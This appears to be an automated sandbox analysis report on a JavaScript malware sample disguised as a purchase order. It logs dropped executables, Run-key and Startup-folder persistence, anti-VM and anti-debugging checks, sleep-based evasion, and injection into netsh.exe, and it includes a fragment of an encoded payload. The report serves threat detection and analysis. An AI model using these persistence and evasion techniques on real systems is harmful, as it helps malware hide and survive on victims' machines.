Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_01
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\explorer.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Outlook\Capabilities Jump to behavior
Source: Binary string: netsh.pdb source: bin.exe, 00000002.00000002.402067381.0000000001910000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: bin.exe, 00000002.00000002.402156937.0000000001940000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000003.296788051.00000000017A4000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.403727008.0000000001A5F000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000003.293862136.000000000160F000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000012.00000003.403509898.0000000003122000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000012.00000003.401276125.0000000002F92000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000012.00000002.894403517.00000000033DF000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000012.00000002.841416056.00000000032C0000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: netsh.pdbGCTL source: bin.exe, 00000002.00000002.402067381.0000000001910000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: bin.exe, 00000002.00000002.402156937.0000000001940000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000003.296788051.00000000017A4000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.403727008.0000000001A5F000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000003.293862136.000000000160F000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000012.00000003.403509898.0000000003122000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000012.00000003.401276125.0000000002F92000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000012.00000002.894403517.00000000033DF000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000012.00000002.841416056.00000000032C0000.00000040.00000800.00020000.00000000.sdmp
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013AC928 push cs; retf 2_2_013AC935
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013A492D push eax; ret 2_2_013A492E
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013BEB3B push dword ptr [7D52CE57h]; ret 2_2_013BEB5E
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013B72B3 push eax; retf 2_2_013B72B4
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013BD625 push eax; ret 2_2_013BD678
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013BD67B push eax; ret 2_2_013BD6E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013BD672 push eax; ret 2_2_013BD678
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013BD6DC push eax; ret 2_2_013BD6E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0333D0D1 push ecx; ret 18_2_0333D0E4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0091C928 push cs; retf 18_2_0091C935
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0091492D push eax; ret 18_2_0091492E
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_009272B3 push eax; retf 18_2_009272B4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0092EB3B push dword ptr [7D52CE57h]; ret 18_2_0092EB5E
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0092D6DC push eax; ret 18_2_0092D6E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0092D625 push eax; ret 18_2_0092D678
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0092D672 push eax; ret 18_2_0092D678
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0092D67B push eax; ret 18_2_0092D6E2
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Source: CIQ-PO116266.js String : entropy: 5.56, length: 330788, content: 'dHJ5ewp2YXIgbG9uZ1RleHQxID0gImRtOXBaQ0FvSVVGeWNtRjVMbkJ5YjNSdmRIbHdaUzVtYjNKRllXTm9JRDhnUVhKeVlYa3V Go to definition
Source: initial sample Static PE information: section name: .text entropy: 7.27935568792
Source: initial sample Static PE information: section name: .text entropy: 7.27935568792
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\bin.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\Lipg\msdxp.exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 204UO0JKWK Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 0JOHZLNP6ZC Jump to behavior
Drops script or batch files to the startup folder
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ORYNeBzyRj.js Jump to dropped file
Stores files to the Windows start menu directory
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ORYNeBzyRj.js Jump to behavior
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ORYNeBzyRj.js Jump to behavior
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 204UO0JKWK Jump to behavior
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 204UO0JKWK Jump to behavior
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 204UO0JKWK Jump to behavior
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 204UO0JKWK Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 0JOHZLNP6ZC Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 0JOHZLNP6ZC Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\bin.exe RDTSC instruction interceptor: First address: 00000000013A8C04 second address: 00000000013A8C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\bin.exe RDTSC instruction interceptor: First address: 00000000013A8F9E second address: 00000000013A8FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: 0000000000918C04 second address: 0000000000918C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: 0000000000918F9E second address: 0000000000918FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 4472 Thread sleep time: -55000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe TID: 6668 Thread sleep count: 42 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe TID: 6668 Thread sleep time: -84000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\netsh.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\netsh.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013A8ED0 rdtsc 2_2_013A8ED0
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bin.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_00921660 FindFirstFileW,FindNextFileW,FindClose, 18_2_00921660
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_00921659 FindFirstFileW,FindNextFileW,FindClose, 18_2_00921659
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: explorer.exe, 00000004.00000000.376453870.0000000008154000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000000.376690845.0000000008290000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Prod_VMware_SATA
Source: explorer.exe, 00000004.00000000.366044669.0000000000680000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&280b647&
Source: explorer.exe, 00000004.00000000.301406958.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.325767526.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000004.00000000.319705739.00000000062C4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.340979864.0000000004287000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
Source: wscript.exe, 00000001.00000002.837229937.000001922CD43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.830621211.000001922CCE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.723845787.000001922CD43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.815966178.00000216E0780000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.608071486.00000216E07E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.831511243.00000216E07E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.759788856.00000216E0787000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.759860590.00000216E07E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.607995177.00000216E0787000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.632243823.0000013D917F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.631696029.0000013D917F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 0000000A.00000003.608046578.00000216E07D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.831489692.00000216E07D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.759844357.00000216E07D3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWF
Source: explorer.exe, 00000004.00000000.348324828.00000000062C4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: <C:\Users\user\AppData\Roamingd_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.325678427.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: wscript.exe, 0000000D.00000003.631461137.0000013D9179A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.789723461.0000013D9179A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.813432842.0000013D91790000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`(
Source: wscript.exe, 00000001.00000002.834416914.000001922CD37000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.723831119.000001922CD37000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWY"
Source: explorer.exe, 00000004.00000000.376453870.0000000008154000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000004.00000000.325767526.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00l
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013A8ED0 rdtsc 2_2_013A8ED0
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\bin.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032E4F2E mov eax, dword ptr fs:[00000030h] 18_2_032E4F2E
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032E4F2E mov eax, dword ptr fs:[00000030h] 18_2_032E4F2E
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331E730 mov eax, dword ptr fs:[00000030h] 18_2_0331E730
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033A131B mov eax, dword ptr fs:[00000030h] 18_2_033A131B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0330F716 mov eax, dword ptr fs:[00000030h] 18_2_0330F716
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0337FF10 mov eax, dword ptr fs:[00000030h] 18_2_0337FF10
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0337FF10 mov eax, dword ptr fs:[00000030h] 18_2_0337FF10
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033B070D mov eax, dword ptr fs:[00000030h] 18_2_033B070D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033B070D mov eax, dword ptr fs:[00000030h] 18_2_033B070D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331A70E mov eax, dword ptr fs:[00000030h] 18_2_0331A70E
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331A70E mov eax, dword ptr fs:[00000030h] 18_2_0331A70E
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03313B7A mov eax, dword ptr fs:[00000030h] 18_2_03313B7A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03313B7A mov eax, dword ptr fs:[00000030h] 18_2_03313B7A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032EDB60 mov ecx, dword ptr fs:[00000030h] 18_2_032EDB60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032FFF60 mov eax, dword ptr fs:[00000030h] 18_2_032FFF60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033B8F6A mov eax, dword ptr fs:[00000030h] 18_2_033B8F6A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033B8B58 mov eax, dword ptr fs:[00000030h] 18_2_033B8B58
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032EDB40 mov eax, dword ptr fs:[00000030h] 18_2_032EDB40
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032FEF40 mov eax, dword ptr fs:[00000030h] 18_2_032FEF40
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032EF358 mov eax, dword ptr fs:[00000030h] 18_2_032EF358
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033B5BA5 mov eax, dword ptr fs:[00000030h] 18_2_033B5BA5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F1B8F mov eax, dword ptr fs:[00000030h] 18_2_032F1B8F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F1B8F mov eax, dword ptr fs:[00000030h] 18_2_032F1B8F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331B390 mov eax, dword ptr fs:[00000030h] 18_2_0331B390
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03367794 mov eax, dword ptr fs:[00000030h] 18_2_03367794
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03367794 mov eax, dword ptr fs:[00000030h] 18_2_03367794
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03367794 mov eax, dword ptr fs:[00000030h] 18_2_03367794
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033A138A mov eax, dword ptr fs:[00000030h] 18_2_033A138A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0339D380 mov ecx, dword ptr fs:[00000030h] 18_2_0339D380
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F8794 mov eax, dword ptr fs:[00000030h] 18_2_032F8794
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033237F5 mov eax, dword ptr fs:[00000030h] 18_2_033237F5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033103E2 mov eax, dword ptr fs:[00000030h] 18_2_033103E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033103E2 mov eax, dword ptr fs:[00000030h] 18_2_033103E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033103E2 mov eax, dword ptr fs:[00000030h] 18_2_033103E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033103E2 mov eax, dword ptr fs:[00000030h] 18_2_033103E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033103E2 mov eax, dword ptr fs:[00000030h] 18_2_033103E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033103E2 mov eax, dword ptr fs:[00000030h] 18_2_033103E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033653CA mov eax, dword ptr fs:[00000030h] 18_2_033653CA
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033653CA mov eax, dword ptr fs:[00000030h] 18_2_033653CA
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0339FE3F mov eax, dword ptr fs:[00000030h] 18_2_0339FE3F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032EE620 mov eax, dword ptr fs:[00000030h] 18_2_032EE620
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F8A0A mov eax, dword ptr fs:[00000030h] 18_2_032F8A0A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03303A1C mov eax, dword ptr fs:[00000030h] 18_2_03303A1C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331A61C mov eax, dword ptr fs:[00000030h] 18_2_0331A61C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331A61C mov eax, dword ptr fs:[00000030h] 18_2_0331A61C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032EC600 mov eax, dword ptr fs:[00000030h] 18_2_032EC600
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032EC600 mov eax, dword ptr fs:[00000030h] 18_2_032EC600
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032EC600 mov eax, dword ptr fs:[00000030h] 18_2_032EC600
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03318E00 mov eax, dword ptr fs:[00000030h] 18_2_03318E00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032EAA16 mov eax, dword ptr fs:[00000030h] 18_2_032EAA16
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032EAA16 mov eax, dword ptr fs:[00000030h] 18_2_032EAA16
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F766D mov eax, dword ptr fs:[00000030h] 18_2_032F766D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0330AE73 mov eax, dword ptr fs:[00000030h] 18_2_0330AE73
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0330AE73 mov eax, dword ptr fs:[00000030h] 18_2_0330AE73
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0330AE73 mov eax, dword ptr fs:[00000030h] 18_2_0330AE73
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0330AE73 mov eax, dword ptr fs:[00000030h] 18_2_0330AE73
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0330AE73 mov eax, dword ptr fs:[00000030h] 18_2_0330AE73
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0332927A mov eax, dword ptr fs:[00000030h] 18_2_0332927A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0339B260 mov eax, dword ptr fs:[00000030h] 18_2_0339B260
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0339B260 mov eax, dword ptr fs:[00000030h] 18_2_0339B260
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033B8A62 mov eax, dword ptr fs:[00000030h] 18_2_033B8A62
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03374257 mov eax, dword ptr fs:[00000030h] 18_2_03374257
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032E9240 mov eax, dword ptr fs:[00000030h] 18_2_032E9240
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032E9240 mov eax, dword ptr fs:[00000030h] 18_2_032E9240
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032E9240 mov eax, dword ptr fs:[00000030h] 18_2_032E9240
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032E9240 mov eax, dword ptr fs:[00000030h] 18_2_032E9240
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F7E41 mov eax, dword ptr fs:[00000030h] 18_2_032F7E41
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F7E41 mov eax, dword ptr fs:[00000030h] 18_2_032F7E41
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F7E41 mov eax, dword ptr fs:[00000030h] 18_2_032F7E41
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F7E41 mov eax, dword ptr fs:[00000030h] 18_2_032F7E41
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F7E41 mov eax, dword ptr fs:[00000030h] 18_2_032F7E41
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F7E41 mov eax, dword ptr fs:[00000030h] 18_2_032F7E41
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331FAB0 mov eax, dword ptr fs:[00000030h] 18_2_0331FAB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032E52A5 mov eax, dword ptr fs:[00000030h] 18_2_032E52A5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032E52A5 mov eax, dword ptr fs:[00000030h] 18_2_032E52A5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032E52A5 mov eax, dword ptr fs:[00000030h] 18_2_032E52A5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032E52A5 mov eax, dword ptr fs:[00000030h] 18_2_032E52A5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032E52A5 mov eax, dword ptr fs:[00000030h] 18_2_032E52A5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033646A7 mov eax, dword ptr fs:[00000030h] 18_2_033646A7
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033B0EA5 mov eax, dword ptr fs:[00000030h] 18_2_033B0EA5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033B0EA5 mov eax, dword ptr fs:[00000030h] 18_2_033B0EA5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033B0EA5 mov eax, dword ptr fs:[00000030h] 18_2_033B0EA5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032FAAB0 mov eax, dword ptr fs:[00000030h] 18_2_032FAAB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032FAAB0 mov eax, dword ptr fs:[00000030h] 18_2_032FAAB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331D294 mov eax, dword ptr fs:[00000030h] 18_2_0331D294
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331D294 mov eax, dword ptr fs:[00000030h] 18_2_0331D294
